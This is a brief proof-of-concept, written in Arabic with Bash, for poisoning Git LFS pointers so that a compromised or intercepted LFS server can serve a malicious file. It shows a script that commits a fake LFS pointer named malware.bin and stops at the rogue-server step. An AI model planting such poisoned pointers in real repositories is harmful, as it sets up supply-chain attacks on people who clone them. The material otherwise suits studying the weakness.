
إثبات مفهوم لتسميم مؤشرات Git LFS، مع سكربتات Bash وPython تنشئ مستودعًا خبيثًا، وتحاكي خادم LFS مارقًا، وتُطلق تنفيذ الأكواد.
# create_malicious_repo.sh - Sets up a repo with poisoned LFS pointer
git init
git lfs track "*.bin"
echo "version https://git-lfs.github.com/spec/v1
oid sha256:4142434445464748494a4b4c4d4e4f505152535455565758595a616263646566
size 4" > malware.bin
git add .gitattributes malware.bin
git commit -m "Add LFS file"
يستخدم المستودع Git LFS لكنه لا يثبّت نقطة نهاية LFS ولا يتحقق من تجزئات الكائنات بعد التنزيل. يمكن للمهاجم الذي يخترق خادم LFS (أو يستطيع تنفيذ هجوم الوسيط) استبدال الملف الكبير بملف خبيث، وعندها يقوم الاستنساخ تلقائيًا بتنزيله وربما تنفيذه.
bash create_malicious_repo.sh
# Then simulate rogue LFS server